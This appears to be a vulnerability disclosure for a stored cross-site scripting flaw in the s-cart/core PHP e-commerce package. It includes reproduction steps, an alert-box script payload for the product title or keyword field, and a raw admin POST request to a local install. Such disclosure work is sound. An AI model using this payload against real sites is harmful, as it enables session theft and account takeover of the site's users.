s-cart/core

vulnerability cross site scripting (xss)
severity 6.6
language php
registry packagist

✍️ Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

🕵️‍♂️ Proof of Concept

1. `git clone https://github.com/s-cart/s-cart` and `composer install`
2. Login as admin and add product.
3. add XSS payload as Product title `"><script>alert("test")</script>` or Keyword as both are vulnerable.
4. Click on send and get the popup.

## POC request:
POST /s-cart/public/sc_admin/product/create HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------391325859225283787311340371998
Content-Length: 3823
Origin: http://localhost:8000
Connection: keep-alive
Referer: http://localhost:8000/s-cart/public/sc_admin/product/create
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; curSection_options=%22meta-polja%22; localhost-cms-admin-files1=%7B%220%22%3A0%7D; BLUDIT-KEY=r7oq4j0i11ldvm76u09r82mfdo; online_inovicing_system=r0e1337b4kup6v48o6t3qal0s7; cat_session_id=1sfltmkpoq80mv9hqhti0d8oug; XSRF-TOKEN=eyJpdiI6ImtXNlZMcDY4SmtOWVRGQUpqTFp1a2c9PSIsInZhbHVlIjoiTzA3cGZNemViTWcra2FPSitqaFVXeE9OWHdvZW42Wk1ML3hpbE1uRTVPcit2M2FaMzBWK3ZORkxaRStNbDFQSWdBNnlVanhFdm1kMlRzSHN3SlEydDJRMHYwcXJaV0wxTVJIUzhIcWJhcGpXVFE0c0RYWUw4cGRHQThBL1o3SW0iLCJtYWMiOiIxZmNhZjg1NjFjOTA4YmJiOWM2OTlmN2VmMDI4OTg1OTRkOWU4YzJhZDVhODk1YmQ3MGMwNTBiMjYzYWEyYmVhIn0%3D; scart_session=eyJpdiI6ImZhaXY5ZUFzenZuRTNoTUY5TmcvRFE9PSIsInZhbHVlIjoiVHB4M09id25mV0IzbFoyd1lKY3R3QWxzaHFnYlVRcldOeGpGMkRwc0YrM3Zuc1dIbDlmZWtpVElGZWc5Q21RckJuMFVMeHpQMTlNUGN0dlp0SkxNenY4OVlrbVJxSC9QS0FpTnBNMUsvTFI2L1d0UHRKSmFvdG9Gem1BNUtOYWUiLCJtYWMiOiIxYzViNmQ1MTU2OGJjNmQwNzBiMzM2YWUxY2M2NTdmZmE1ZjE0YTlkZDkzNDEwMmUyNGYzMzNlODQ4ZTYyOTM5In0%3D
Upgrade-Insecure-Requests: 1

Screenshot:

image

💥 Impact

With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.